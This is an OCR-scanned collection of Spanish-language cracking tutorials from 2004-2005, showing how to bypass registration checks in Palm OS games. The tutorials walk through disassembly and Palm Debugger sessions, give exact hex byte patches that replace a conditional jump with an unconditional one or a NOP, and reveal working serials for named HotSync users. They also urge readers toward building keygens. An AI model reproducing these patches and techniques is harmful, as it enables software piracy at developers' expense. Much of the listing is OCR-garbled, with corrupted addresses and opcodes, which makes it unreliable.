MOVEQ L H$0A, D4 | 780A 

ANDI. L *$0000éFFFF, Dl ; '....' | 0281 0000 FFFF 
DI VU. WD4, Dl | 82C4 

MOVE. L D1,D2 | 2401 

SWAP D2 | 4842 

MOVE. B D2, D1 | 1202 

ADDI . B +$30,D1 ; '0' | 0601 0030 
MOVE. B D1, $00(A0, DO.L) | 1181 0800 
BRA. W*+$0064 ; O0060A0C | 6000 0062 
CWPI . W*f$0002, - $0002(A6) ; '..' | OC6E 0002 FFFE 
BLS. S *+$0032 ; 0006094 | 6330 
MOVE. W-$0002(A6), DL | 322E FFFE 
ADDQ. W $01, Dl | 5241 

MOVEQ. L *t500, DO | 7000 

MOVE. WD1, DO | 3001 

LEA - $0040(A6),A0 | 41EE FFCO 

MOVE. W- $0008(A6),D3 | 362E FFF8 
MOVE. WD3, Dl | 3203 


000609C8 MOVEQ L +$0A, D4 | 780A 

000609CA ANDI.L *$0000éFFFF, D1 ; '....' | 0281 0000 FFFF 
000609DO DI VU. WD4, Dl | 82C4 

000609D2 MOVE. L D1,D2 | 2401 

000609D4 SWAP D2 | 4842 

000609D6 MOVE. B D2, D1 | 1202 

000609D8 ADDI.B *+$30,D1 ; '0' | 0601 0030 

000609DC MOVE. B Dl, $00(A0, DO. L) | 1181 0800 

000609E0 BRA. W*+$002C ; O0060A0C | 6000 002A 
000609E4 MOVEQ L *$00, DO | 7000 

000609E6 MOVE. W-$0002(A6),DO | 302E FFFE 

000609EA LEA -$0040(A6),AO | 41EE FFCO 

000609EE MOVE. W-$0008(A6),D3 | 362E FFF8 

000609F2 MOVE. WD3, D1 | 3203 

000609F4 MOVEQO. L +*$0A, D4 | 780A 

000609F6 ANDI.L *$0000éFFFF, D1 ; '....' | 0281 0000 FFFF 
000609FC DI VU. WD4, Dl | 82C4 

000609FE MOVE. L D1,D2 | 2401 

00060400 SWAP D2 | 4842 

00060A02 MOVE. B D2,D1 | 1202 

00060404 ADDI.B +$30,D1 ; '0' | 0601 0030 

00060408 MOVE. B Dl, $00(A0, DO. L) | 1181 0800 

00060A0C MOVE. B +$2D, - $003D(A6) ; '-* | 1D7C 002D FFC3 
00060A12 MOVE. B +$2D, - $003A(A6) ; '-' | 1D7C 002D FFC6 
00060418 CLR. B -$0036(A6) | 422E FFCA 

00060A1C ADDQ. W $01, - $0002(A6) | 526E FFFE 

00060420 BRA. W*-$0126 ; 000608FA | 6000 FED8 
00060424 MOVE. L $0008(A6),-(A7) | 2F2E 0008 

00060428 MOVEQ L ++ $40, DO | 70CO 

00060A2A ADD. L A6, DO | DO8E 

00060A2C MOVE. L DO, -(A7) | 2FOO 

00060A2E _StrCompare ; $1001C2E2 | 4E4F AOC8 

00060432 ADDQ. L +$08, A7 | 508F 

00060434 TST.WDO | 4440 

00060436 BNE.S *+$0028 ; 00060A5E | 6626 

00060A38 MOVE. WH$03FO0, -(A7) ; 'p.' | 3F3C 03FO 
00060A3C _FrmAlert ; $10069070 | 4E4F A192 

00060440 ADDQ. L *+$02, A7 | 548F 

00060442 LEA -$3990(A5),A1 | 43ED C670 

00060446 MOVE. L A1,A0 | 2049 

00060448 MOVE. L +$357AB7E0, $0002(A0) ; '5z7"' | 217C 357A B7E0 0002 
00060450 LEA -$39BE(A5),A1 | 43ED C642 

00060454 MOVE. L A1,A0 | 2049 


00060A56 MOVE. W+$2253, (A0) ; 'S"' | 30BC 2253 
00060A5A BRA. W*+$000E ; 00060468 | 6000 000C 
00060A5E MOVE. W+$03F1, -(A7) ; 'q.' | 3F3C 03F1 


00060462 _FrmAlert ; $10069070 | 4E4F A192 
00060466 ADDQ. L *+$02, A7 | 548F 

00060468 MOVE. L -$0048(A6),D3 | 262E FFB8 
00060A6C MOVE. L - $0044( 46), D4 | 282E FFBC 
00060A70 UNLK A6 | 4E5E 

00060A72 RTS | 4E75 

00060474 | 4578 

00060A76 MOVEQ L $69, DO | 7069 

00060A78 MOVEQ. L +$65, D1 | 7265 

O00060A7A MOVE. L $6E20(A1), AO | 2069 6E20 
00060A7E MOVE. L $44(A5, D2. W, $6179(A2) | 2575 2044 6179 
00060484 MOVEQ. L *$00, D1 | 7300 

00060486 LINK A6, - $0038 | 4E56 FFC8 

00060A8A CLR. B -$0003(A6) | 422E FFFD 
00060A8E _FrmtetActiveForm; $10067DFE | 4E4F A173 
00060492 MOVE. L AO, DO | 2008 

00060A94 MOVE. L DO, - $0008(A6) | 2D40 FFF8 
00060498 MOVE. W$0008(A6),DO | 302E 0008 
00060A9C ADDI. W+$FC17, DO ; '..' | 0640 FC17 
O0060AA0 CMPI. W+$0006, DO ; '..' | 0C40 0006 
00060444 BHI. W*+$0290 ; 00060D34 | 6200 028E 
00060448 MOVEQ L +$00, D1 | 7200 

OO060AAA MOVE. WDO0, D1 | 3200 

O0060AAC MOVE. L D1,DO | 2001 

O0060AAE ADD. L DO, D1 | D280 

00060ABO MOVE. W*-+$0008( Dl. L), DO | 303B 1806 
00060AB4 J WP *+$0004( DO. W | 4EFB 0002 
00060AB8 ORI.B +t$2A,A6 ; '*' | 0O00É 002A 


O0060ABC BCLR DO, -(A2) | 01A2 

O0060ABE CRI. W+$022A, (A6)+; '*.' | 005E 022A 
00060AC2 ANDI . W+t$0260, SR ; '*.' | 027C 0260 
00060AC6 CLR.L -(A7) | 42A7 

00060AC8 _MenuEraseStatus ; $1006CFDC | 4E4F A1C1 
00060ACC ADDQ. L +$04, A7 | 588F 


Esto se consigue cambiando 


0000881F 2F 2E 00 08 MOVE.L $8(A6), -(A7) 
00008823 70 CO MOVE.L +$C0, DO 

00008825 DO 8E ADD.L A6, DO 

00008827 2F 00 MOVE.L DO, -(A7) 

00008829 4E 4F AO C8 SysTrap StrCompare 
0000882D 50 8F ADD.L +58, A7 

0000882F 4A 40 TST.W DO 


=--- Salta a la ventana de registro invalido. 
00008833 3F 3C 03 FO MOVE.W +$03F0, -(A7) 


Parchar por: 


0000881F 2F 2E 00 08 MOVE.L $8(A6), -(A7) 

00008823 70 CO MOVE.L +$C0, DO 

00008825 DO 8E ADD.L A6, DO 

00008827 2F 00 MOVE.L DO, -(A7) 

00008829 4E 4F AO C8 SysTrap StrCompare 

0000882D 50 8F ADD.L +$$8, A7 

0000882F 4A 40 TST.W DO 

00008831 4E 71 NOP Hacer que siempre valla a la ventana de registro valido. 
00008833 3F 3C 03 FO MOVE.W +$03F0, -(A7) 


Cargando el juego y registrarnos parece que valida cualquier cosa sin importar el Nombre del 
HotSync, adelantamos el reloj y nada , entramos y salimos del juego varias veces y todo bien sigue 
registrado, esto es porque parte de la rutina de comprobación esta en la dirección 00008831, de este 
simple salto depende si estamos Óó no registrados, Esta protección es amigable porque hay otras 
protecciones en otros programas solo nos despistan cuando cambiamos este salto y tienen más rutinas 
de comprobación, Pero aqui no se utilizan trampas anti Palm Cracker, Parece ser que la versión de 
MatchChamp v1.1 Ya cambio su rutina de protección, La analizaremos en otra ocación. Ustedes pueden 
crear un keygen partiendo del llamada API DlkGetSyncInfo e ir rastreando paso por paso con el 
PalmDebugger , Bye. 


By Chucky 


America 2005 
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(OSerial ( )HotSync/ Code ()Trial ()Multiprotección ( )Encriptado ( )Otro 


Programa para checar el hardware de la PDA 
Encontrar el serial (Aprender a usar el Palm debugger nadando en código vivo) 
(X)NewBies ( )Intermedio ()Avanzado ()Master ( )Gúru 


INTRODUCCION 


Desensablamos el programa con el palmdemon v0.27 buscamos las referencias a las APIS y encontramos 

una referencia al "systrap StrCompare" (Aqui pondremos un breakpoint en el Palm 
debugger atb "StrCompare" ) , el 99% de las aplicaciones hasta antes del 2005 úilizaban esta rutina 
de comprobación para el serial falso y el verdadero , ahora raramente podemos ya encontrarla, debido a que 
ya la mayoría de programadores opta por la protección HotSync/Name Code 


AL ATAQUE 


Bien cargamos el emulador y la aplicación PRC en cuestión, Acto seguido cargamos el Palm debugger en mi caso el 
v3.6 , Entramos al programa en el emulador e intentamos registrarnos con los datos siguientes: 


User name: Benito 
Registration Key: 1234567890 <--- Serial falso por supuesto 


En el Palm debugger 3.6d7 aparece lo siguiente 


Initializing parser.. 
Initializing lex.. 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsOn = true 
StepRegs = false 


ReadMemHack = 


Attached 


dot address = 
last address = 
last count = 


false 

= false 
00000000 
00000000 
00000000 


att 


<-—-- para conectar con el emulador 
EXCEPTION 1D = 


$80 


'"TargetCfgRoutines' 
+500F0 1018871C *LINK A6,$0000 | 4E56 0000 


atb "StrCompare" 
A-trap set on 00c8 


<-—-—- API para comparar el serial falso con el verdadero 
(StrCompare) 


g <--—- Conectá al emulador y esperá para dar un salto 


EXCEPTION 1D = 


$80 


0004A4EA *_StrCompare ; $1001C2E2 | 4E4F A0C8 

il <--—- Para saber si verdaderamente estamos en el código vivo del PRC 
0004A4EA *_StrCompare ; $1001C2E2 | 4E4F A0C8 

0004A4EE ADDQ.W +$08,A7 | 504F 

0004A4F0O TST.W DO | 4A40 

0004A4F2 BNE.W *+50276 ; 0004A768 | 6600 0274 

0004A4F6 LEA *-$0532,A1 ; 00049FC4 | 43FA FACC 

0004A4FA MOVE.L A1,-(A7) | 2F09 

0004A4FC MOVE.L A2,-(A7) | 2F0A 


0004A4FE _StrCopy ; $1001C044 | 4E4F AOC5 


0004A502 MOVE.B +$$01,-$02B9(A6) ; '.' | 1D7C 0001 FD47 

0004A508 MOVE.W H$$0003,-(A7) ; '..' | 3F3C 0003 

dm a0 

0003B8F4: 35 32 32.33 35 00.20 65 6E 714 65 72 20 72 65 67 * enter reg" 
0003B904: 69 73 74 61 74 69 6F 6E 20 6B 65 79 00 6F 6E 20 "istation key.on " 
0003B914: 6B 65 79 00 00 04 0C 46 00 00 00 00 00 00 20 04 "key....F...... ad 
0003B924: FF FF 00 00 00 00 10 18 10 18 7F 40 00 03 E6 7C "......o.... AN 
dm a2 

0003B8F4: 35 32 32 33 35 00 20 65 6E 74 65 72 20 72 65 67 " . enter reg" 
0003B904: 69 73 74 61 74 69 6F 6E 20 6B 65 79 00 6F 6E 20 "istation key.on " 
0003B914: 6B 65 79 00 00 04 0C 46 00 00 00 00 00 00 20 04 "key....F...... % 
0003B924: FF FF 00 00 00 00 10 18 10 18 7F 40 00 03 E6 7C "....o..o.... A 
0003B984: BA 26 00 03 E2 94 00 00 00 00 00 03 B9 CE 10 08 ".S...oocoooo..... " 


Encontramos que el serial verdadero es 52235 para un Name 
encontrar el Key para su propio nombre. 


: Benito , Cada quien puede 


Les corresponde a Cada uno de ustedes rastrear instrucción por instrucción , hasta 
encontrar el serial,Esto es todo por hoy , hasta la próxima , no olviden en formarse 
un criterio para realizar no solo este objetivo del reversing si no de cualquier tipo, 
Hacemos la aclaración que solo intentamos depurar esta aplicación y no intentamos 
dañar al programador, por lo que debugging no es ilegal al menos en mi país de lo 
contrario no habría depuradores ni desensambladores ni editores hexadecimales, etc. 


Alguien se preguntara y este tipo por que analiza las protecciones más simples, pues 
yo les digo que este es solo el principio para saber como funcionan estos menesteres, 
Ya teniendo los debidos conocimientos entonces iremos avanzando de Newbie a Giúru y 

ustedes escuincles de menos de 15 años serán los que guiarán a los futuros crackers. 
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(OSerial ( )HotSync/ Code ( )Trial ( )Multiprotección ( )Encriptado ( )Otro 


(X)NewBies ( )| ntermedio ( )Avanzado ( ) Master ( )Guúru 
http: //www.google. com 

SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 
Adamántar FECHA: — 5/31/04/2005 


INTRODUCCION 


Se trata de un juego de Hockey Hmmmmmmm Con esto para que queremos Game Boy Advance 


AL ATAQUE 


Curiosamente este programa solo tiene la ventana de mensaje si has registrado correctamente, Con PalmDemon 0.27 
desensamblamos y de tarea les dejamos que las busquen . 


1.- Paso analizar el código muerto 


00005D80 4E BA CE B6 JSR.L LOC_2C38 
00005D84 4F EF 00 20 LEA.L $20(A7), A7 
00005D88 4E 75 RTS 

loc_5D8A: 

00005D8A 51 4F SUB.W +$$8, A7 

00005D8C 4A 2D F8 C6 TST.B VAR_73A 
00005D90 66 2A BNE.S LOC_5DBC 

00005D92 70 06 MOVE.L +$$6, DO 

00005D94 90 6D F8 CC SUB.W VAR_734, DO 
00005D98 48 CO 

00005D9A 2F 00 MOVE.L DO, -(A7) 

00005D9C 48 6F 00 04 PEA.L $4(A7) 
00005DAO0 4E 4F AO C9 SysTrap StrIToA 
00005DA4 48 78 00 00 PEA.L $0 

00005DA8 48 78 00 00 PEA.L $0 

00005DAC 48 6F 00 10 PEA.L $10(A7) 
00005DB0O 3F 3C 05 14 MOVE.W +$0514,-(A7) ¡Versión unregistered, 1 juego restante 
00005DB4 4E 4F Al 94 SysTrap FrmCustomAlert 
00005DB8 4F EF 00 16 LEA.L $16(A7), A7 
loc_5DBC: 

00005DBC 50 4F' ADD.W +$8, A7 

00005DBE 4E 75 RTS 

loc_5DCO: 

00005DCO 4F EF FF E8 LEA.L -$18(A7), A7 
00005DC4 4A 2D F8 C6 TST.B VAR_73A 
00005DC8 67 08 BEQ.S LOC_5DD2 

00005DCA 70 00 MOVE.L $0, DO 

00005DCC 4F EF 00 18 LEA.L $18(A7), A7 
00005DDO 4E 75 RTS 

loc_5DD2: 

00005DD2 0C 6D 00 04 F38.. CMP.W +$0004, VAR_734 
00005DD8 6F 06 BLE.S LOC_5DEO 

00005DDA 1B 7C 00 01 MOVE.B +$7C, $1(A5) 
00005DDE F8 C7 DC.W +F8C7 

loc_5DEO: 

00005DE0O 4A 2D F8 C7 TST.B VAR_739 
00005DE4 67 00 00 B6 BEQ LOC_5E9C 
00005DE8 3F 3C 05 DC MOVE .W +$05DC, -(A7) 


MegaHockey registration 


Please enter the registration code 
sent to you when you registered 


¡Resource ID: 1500 (0x5DC] — File Off: 


X-ref to Form (MegaHockey registration) 


00005DEC 4E 4F Al 6F SysTrap FrmInitForm 
00005DFO 2B 48 F7 FO MOVE.L AO, VAR_810 
00005DF4 42 2D F7 F4 CLR.B VAR_80C 
Cortamos el código hasta 

loc_60DA: 

000060DA 3F 3C FF FF MOVE.W FSFFFF, -(A7) 
000060DE 4E BA 00 82 JSR.L LOC_6162 
000060E2 70 01 MOVE.L +$1, DO 

000060E4 4F EF 00 1C€C LEA.L $1C(A7), A7 
000060E8 4C DF 

000060EA 0C 08 CMP.B +$8, AO 

000060EC 4E 75 RTS 

loc_60EE: 

000060EE 48 6D F7 F4 PEA.L VAR_80C 
000060F2 48 6F 00 14 PEA.L $14(A7) 
000060F6 4E 4F AO C5 SysTrap StrCopy 
000060FA 48 6D F7 FA PEA.L VAR_806 
000060FE 48 6F 00 20 PEA.L $20(A7) 
00006102 4E 4F AO C5 SysTrap StrCopy 
00006106 48 6F 00 10 PEA.L $10(A7) 
0000610A 48 6F 00 24 PEA.L $24(A7) 
0000610E 4E 4F AO C7 SysTrap Strlen 
00006112 58 4F ADD.W +4$4, A7 

00006114 3F 00 MOVE.W DO, -(A7) 

00006116 48 6F 00 26 PEA.L $26(A7) 
0000611A 4E 4F A2 F1 SysTrap EncDigestMD5 
0000611E 76 00 MOVE.L $$0, D3 

00006120 0C 43 00 10 CMP.W *F$0010, D3 
00006124 4F EF 00 1A LEA.L $1A(A7), A7  <---Leer el contenido de memoria 
00006128 6C 18 BGE.S LOC_6142 <---— Cambiemos este por un BRA (60) 
0000612A 45 ED FF 3A LEA.L VAR_C6, A2 
0000612E 47 D7 LEA.L (A7), A3 

loc_6130: 

00006130 10 13 MOVE.B (A3), DO 

00006132 BO 12 CMP.B (A2), DO 

00006134 66 20 BNE.S LOC_6156 

00006136 52 8A ADD.L +$$1, A2 

00006138 52 8B ADD.L +$$1, A3 

0000613A 52 43 ADD.W +$$1, D3 

0000613C 0C€ 43 00 10 CMP.W F$0010, D3 
00006140 6D EE BLT.S LOC_6130 

loc 6142; 

00006142 1B 7C 00 01 MOVE.B +$7C, $1(A5) 
00006146 F8 C6 DC.W $F8C6 

00006148 42 2D F8 C7 CLR.B VAR_739 
0000614C€ 3F 3C 05 78 MOVE.W +$0578, -(A7) 


MegaHockey registration (Y) 


Successfull registration! 
Thank you for support. 


1400 (0x578] 


X-ref to Alert (MegaHockey registration) 


00006150 4E 4F Al 92 SysTrap FrmAlert 
00006154 54 4F ADD.W +$$2, A7 

loc_6156: 

00006156 70 00 MOVE.L +$0, DO 

00006158 4F EF 00 1A LEA.L $1A(A7), A7 
0000615C€ 4C DF 

0000615E 0C 08 CMP.B +$8, AO 

00006160 4E 75 RTS 

loc_6162: 

00006162 48 E7 

00006164 18 30 5D 4F MOVE.B $4F(AO0, D5.W), D4 
00006168 36 2F 00 1A MOVE.W $1A(A7), D3 
0000616C€ 3F 3C 06 13 MOVE.W +$0613, -(A7) 
00006170 2F 2D F7 FO MOVE.L VAR_810, -(A7) 
00006174 4E 4Fr Al 80 SysTrap FrmGetObjectIndex 
00006178 5C 4F ADD.W +$$6, A7 


2. Paso cambiar BGE (6c) por BRA (60) 


Abrimos el Editor Hexadecimal y con el archivo víctima en modo hexadecimal buscamos la cadena 


4F EF 00 1aA 6C 18 45 ED FF 3A 


la cambiamos por: 
4F EF 00 1A 60 18 45 ED FF 3A 


Antes 


00006120 0C 43 00 10 CMP.W +$0010, D3 
00006124 4F EF 00 1A LEA.L $1A(A7), A7  <---Leer el contenido de memoria 


00006128 6C 18 BGE.S LOC_6142 <-—--—- Cambiemos este por un BRA (60) 


0000612A 45 ED FF 3A LEA.L VAR_C6, A2 
0000612E 47 DY LEA.L (A7), A3 


Despues 


00006120 0C 43 00 10 CMP.W +$0010, D3 
00006124 4F EF 00 1A LEA.L $1A(A7), A7  <---Leer el contenido de memoria 
00006128 60 18 BRA.s LOC_6142 <--—-— Cambiemos este por un BRA (60) 


0000612A 45 ED FF 3A LEA.L VAR_C6, A2 
0000612E 47 DY LEA.L (A7), A3 


2. Paso Resultado 


El programa parece registrarse con cualquier serial y funciona perfectamente. La misma rutina la usa la versión del 
programa en formato de grises así que no tendremos problemas al hacer los correspondientes cambios. 
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INTRODUCCION 


Este Juego tiene protección antidesensamblado. y además tiene una protección HotSync/Name Code , por lo 
que el serial no nos valdrá a todos. El serial que debemos escribir solo se limita a 5 dígitos no podemos 
escribir más, Esto es importante para rastrear el serial, para corregir esto 

, (Después me di cuenta que no esta estaba protegido 
con antidesensambler, pues era mi PCera que tardo en desensamblar y parecia que se habia bloqueado el 
programa), de cualquier manera buen tip este. 


AL ATAQUE 
OPCION I : ENSEÑAR A PESCAR SERIALES Y NO A ROBAR SERIALES: 


Cargando el PRC en el emulador, Cargar el PalmDebugger, Como no eh encontrado alguna herramienta 
antidesensamblado, procedemos empiricamente, Primero pondremos, Breakpoints hasta encontrar uno que salte al 
debugger (Ya estando hay Con "il" podremos ver el código real del PRC , basta con presionar varias veces enter despues 
de dicho "il”). 


Habiendo el PRCExplorer v1.0.18.5 Este no tiene protección anti-Editor hexadecimal, 
JAJAJAJA , se nos cierran unas puertas pero se nos habren otras. 


Con este mismo encontramos las alertas TALT's , La 1001(0x3e9) que tiene varios 
mensajes como el "*1" y es donde tambien se muestra el mensaje de, Al hacer pruebas en 
el emulador encontramos 


Analizaremos el desensamblado partiendo desde la API "DIkKGetSyncInfo", Mostrado más arriba de este tutorial vemos 
que de nada nos sirve NOPear el offset [00007B8D 67 4E BEQ.S LOC_7BDD ] por un [00007B8D 4E 71 


NOP ] pues al intentar volver a registrarnos aparece en el menú la opción para registrarse, pero según el analisis echo, 


al registrarnos correctamente desaparece la opción de registrarse. 


[| Game | MATES Help Game KA, [Help] 
IFE Preferences ¿ALE (FA: Preferences ¿ 
E [] Define Keys [] E Define Keys 


Registration 


Unregistered Registered 


Lo indica que debemos de toparnos frente a frente a la rutina de comparación del serial falso con el bueno , puesto que 
en el debugger ya comprobamos que se guarda en un solo bloque de la en la memoria el serial falso con el verdadero , 
esto nos da la pista de que tenemos que encontrar una instrucción que compare un registro (DO..... a D7) contra (AO..... 
A”), esta comprobación podría estar no solo en el segmento CODE 0x01 si no también en el CODE 0x02 (Este truco ya 
es muy viejo y obsoleto de los libros de Visual C++ Net : El de esconder la rutina de comprobación, El 
programador simplemente usa funciones echas a llamadas en otros archivos (Suma primero en este archivo esta 
variable y en este otro archivo divide, en este otro has la raíz cuadrada ... etc) y al compilar el PRC tiene saltos por 
varios lados, Pero tenemos al Debugger que siempre le sigue la pista a lo que hace el microprocesador) , por lo que 
buscaremos la comprobación utilizando el Palmdebugger, Iremos rastreando instrucción por instrucción hasta encontrar 
una posible instrucción sospechosa. 


Con el serial temporal que encontramos arriba iremos rastreando, Cargamos nuevamente todo, Debugger, Emulador , 
Pondremos un Breakpoint desde que se lee nuestro nombre de HotSync, este nos servira para crear a futuro un keygen. 
(Esta vez nos registraremos con los datos buenos, Previamente encontrados) 


PASO Il : Intentamos con Registrarnos incorrectamente : 


atb "FrmCustomAlert" ¡; atb "StrCompare" ; atb "FrmAlert" ¡atb "DlkGetSyncInfo" 
Primero con atb "D1kGetSyncInfo" 

Registrando con: 

HotSync/Name: compaq 

Code: 12345 (Solo acepta 5 digitos por eso ponemos solo 5) 

Debugger salta a: 


Initializing parser... 
Initializing lex... 
Installing keywords... 
Initializing eval... 
Initializing exec... 
Loading startup script... 


Deb0ut = false 
SymbolsO0n = true 
StepRegs = false 
ReadMemHack = false 
Attached = false 

dot address = 00000000 
last address = 00000000 
last count = 00000000 


att 
EXCEPTION ID = $80 
'"TargetCfgRoutines' 
+$00FO 1018871C.  *LINK A6, 50000 | 4E56 0000 
atb "DlkGetSyncInfo" 
A-trap set on 02a9 (Dl1kGetSyncInfo) 


g 
EXCEPTION ID = $80 


0005EF9C  *_Dl1kGetSyncInfo ; $100535FA 4E4F A2A9 

q <-—-—- Que nos muestre las 10 intrucciones proximas (para saber a donde estamos) 
0005EF9C  *_Dl1kGetSyncInfo ; $100535FA 4E4F A2A9 
O005EFAO MOVE.L Al, -(A7) 2F0C 
0005EFA2 PEA *+50010 ; O005EFB2 487A 000E 
O005EFA6 PEA *+50006 ; OO005EFAC 487A 0004 
O005EFAA ADDI.L +$000030FA, (A7) IS DIE 0697 0000 
0005EFBO RTS(JSR) ; BZO0FFEFAC 4E75 
0005EFB2 MOVE .L DO,D5 2A00 
0005EFB4 IST.B (A4) 4A14 
O005EFB6 LEA $002C(A7),A7 4FEF 002C 
O005EFBA BNE.S *+50004 ; OO0O5EFBE 6602 

t <-—--—- Presionamos la tecla enter hasta que nos mande al debugger 


EXCEPTION ID = $80 


O0O05EFAO *MOVE.L A4,-(A7) 2F0C 
0O005EFA2  *PEA *+$0010 ; O005EFB2 487A 0005 
O005EFAG  *PEA *+$50006 ; OOO05EFAC 487A 0004 
O0OO05EFAA *ADDI.L +$000030FA, (A7) A IS 0697 0000 
O005EFBO  *RTS(UJSR) ; 30FFEFAC 4E75 
000620A6 *MOVEM.L D3-D5/A2-A3,-(A7) 48E7 1C30 
000620AA *LEA -$0014 (A7),A7 4FEF FFEC 
000620AE *MOVE.L $002C(A7),A3 266F 002€ 
000620B2 *MOVE.L A3,A2 244B 
000620B4 *MOVEQ.L +$00,D5 7A00 
Will Branch 
000620B6 *BRA.S *+$0006 ; 000620BC 6004 
000620BC  *TST.B (A2) 4A12 


Will Branch 


; NO SALTA CON SERIAL FALSO 


000620B8 *ADDQ.W +$01,D5 5245 
000620BA *ADDO.L $+$01,A2 528A 
000620BC  *TST.B (A2) 4A12 
Will Branch 
000620BE *BNE.S *=$50006 ; 000620B8 66F8 
000620B8 *ADDQ.W +$01,D5 5245 
000620BA *ADDOQO.L +$01,A2 528A 
000620BC  *TST.B (A2) 4A12 


Will Branch 


; NO SALTA CON SERIAL FALSO 


000620B8 *ADDQ.W +$01,D5 5245 
000620BA *ADDO.L $+$01,A2 528A 
000620BC  *TST.B (A2) 4A12 
Will Branch 
000620BE *BNE.S *=$0006 ; 000620B8 66F8 
000620B8 *ADDQO.W $+$01,D5 5245 
000620BA *ADDO.L $+$01,A2 528A 
000620BC  *TST.B (A2) 4A12 
Will Branch 
000620BE *BNE.S *=$0006 ; 000620B8 66F8 
000620B8 *ADDQ.W +$01,D5 5245 
000620BA *ADDO.L +$01,A2 528A 
000620BC  *TST.B (A2) 4A12 


30FA 


30FA 


EXCEPTION 


EXCEPTION 


Cuando llegemos hasta aqui vemos el siguiente código 


000620BE 
000620B8 
000620BA 
000620BC 


000620BE 
000620C0 


000620C4 
000620FA 
000620FC 
000620FE 


00062100 
0006211E 


00062120 
00062102 
00062104 
00062106 
00062108 
ID = $80 
0006210€C 
0006210E 
00062110 


0006211A 
0006211C 
0006211E 


00062120 
00062102 
00062104 
00062106 
00062108 
$80 
0006210C 
0006210E 
00062110 


2 
| 4 
0006211A 
E 
E 


00062120 


00062102 
00062104 
00062106 
00062108 


0005F024 
0005FO0A 
0005F00C 
0005F010 
0005F014 
0005F018 


*BNE.S 
*ADDO .W 
*ADDO.L 
*TST.B 


*BNE.S 
*CMPI .W 


*BLE.S 

*MOVE.L 
*MOVEQ.L 
*MOVEQ.L 


*BRA.S 
*TST.B 


*BNE.S 
*MOVE .W 
*MOVE .W 
*MOVE.B 
*JSR 


*EXT.L 
*MOVE.L 
*ADDO .W 


*ADDO.L 
*ADDO .W 
*TST .B 


*BNE.S 
*MOVE .W 
*MOVE .W 
*MOVE.B 
*JSR 


*EXT.L 
*MOVE.L 
*ADDO .W 


*BGE.S 
*ADDI.L 
*ADDO.L 
*ADDO .W 
*TST.B 


*BNE.S 


*MOVE .W 
*MOVE .W 
*MOVE.B 
*JSR 


*BLT.S 
*MOVEQ.L 
*MOVE.B 
*LEA 
*MOVE.B 
*EXT.W 


*-$0006 
+$01,D5 
+$01,A2 
(A2) 


*-$0006 
+$000A,D5 


*+5$0036 
A3,A2 

$$00,D3 
$S00,D4 


*+$001E 
(42) 


*-$001E 
D4,-(A7) 
D3,-(A7) 
(A2),-(A7) 
*—-S$00AE 


DO 
DO,D4 
$S06,A7 


Will Branch 
; 000620B8 


Will Not Branch 
; 000620B8 
; O] 
Will Branch 
; 000620FA 


Will Branch 
; 0006211E 


Will Branch 
; 00062102 


; 0006205A 


Will Branch 


; NO SALTA CON SERIAL FALSO 


+$01,A2 
+$01,D3 
(A2) 


*-$001E 
D4,-(A7) 
D3,-(A7) 
(A2),-(A7) 
*—-S$00AE 


DO 
DO,DA4 
$S06,A7 


*+$0008 
+$500010000,D4 
+$01,A2 
+$01,D3 

(A2) 


*—-S$001E 


Will Branch 
¿ 00062102 


; 0006205A 


Will Not Branch 
¿ 0006211A 


. y y 
7 .... 


Will Branch 
; 00062102 


; NO SALTA CON SERIAL FALSO 


D4,-(A7) 
D3,-(A7) 
(A2),- (47) 
*-S$00AE 


*-$001A 

$S00,DO 
$00(A2,D3.0W),DO 
-$35D0 (A5),A0 
$24 (A0,D3.0W),D1 
D1 


; 0006205A 


Will Branch 
; O005FO0A 


66F8 
5245 
528A 
4A12 


66F'8 
0C45 000A 


6F34 
244B 
7600 
7800 


601C 
4A12 


66E0 
3F04 
3F03 
1F12 
4EBA FF50 


4EBA FF50 


48C0 
2800 
5C4F 


6C06 
0684 0001 0000 
528A 
5243 
4A12 


66E0 


3F04 
3F03 
1F12 
4EBA FF50 


6DE4 
7000 
1032 3000 
41ED CA30 
1230 3024 
4881 


0005FO1A  *CMP.W DO,D B240 
; OJO AQUI COMPARA DOS REGISTROS 
Will Not Branch 


+S000A 
; NO SALTA CON SERIAL FALSO 


0005F01E *ADDO.W FS01,D3 5243 
0005F020 *CMPI.W $$0005,D3 a 0C43 0005 
Will Branch 
0005F024 *BLT.S *-$S001A ; O005FOO0A 6DE4 
0005FO0OA *MOVEQ.L *+$S00,DO 7000 
0005F00C  *MOVE.B $00 (A2,D3.W),DO 1032 3000 
0005F010 *LEA -$35D0(A5),A0 41ED CA30 
0005F014 *MOVE.B $24(A0,D3.W),D1 1230 3024 
0005F018  *EXT.W D1 4881 
0005F01A *CMP.W DO,D1 B240 
Will Branch 
0005F01C  *BNE.S *+$000A ; 0005F026 6608 
0005F026 *CMPI.W $$0005,D3 e 0C43 0005 


; SALTA CON SERIAL FALSO] 


0005F032 *MOVE.L A2,-(A7) | 2F0A 

0005F034 *_MemChunkFree ; S1001EF3C | 4E4F A012 
EXCEPTION ID = $80 

0005F038 *ADDOQ.W 1$04,A7 | 584E 

0005F03A *TST.B -$35A2 (A5) | 4A2D CASE 


; SALTA CON SERIAL FALSO)| 


0005F08E  *CMPI.W $$0003,-$35A0(A5) Ma 0C6D 0003 CA60 
Will Branch 
0005F094 *BLT.S *+$0006 ¿ O005FO9A 6D04 
0005F0O9A *ADDO.W +$01,-$35A0(A5) 526D CA60 
O0005FO9E *_TimGetSeconds ; $10082FA8 4E4F AOF5 
EXCEPTION ID = $80 
0005F0A2  *MOVE.L DO, -$359E(A5) 2B40 CA62 
0005F0AG  *LEA *+500A6,A0 ¿ 0005F14C 41FA 00A4 
O0005FOAA *PEA (A0) 4850 
0005FOAC *LEA *+500A2,A0 ¿ 0005F14E 41FA 00A0 
0005FOBO *PEA (A0) 4850 
0005F0B2 *LEA *+5009E,A0 ¿ O0005F150 41FA 009€ 
0005FO0B6 *PEA (A0) 4850 
0005F0B8  *MOVE.W +SUESE], — (A7) A 3F3C 03E9 
O005FOBC *_FrmCustomAlert ; $1006969C 4E4F A194 
EXCEPTION ID = $80 
O005FOBC *_FrmCustomAlert ; $1006969C 4E4F A194 


Registration 
PAC-MAN 


Input Registration Key. 


9) Wrong Registration 
Key. Please checkit. 


dm a2 50 <-—-—- Aqui observamos el serial 18698 para un HotSync/Name: compaq 
0003BBB0O: 31 38 36 39 38 00 0A 00 00 04 00 00 00 50 FO 00 "18698........ Puan 
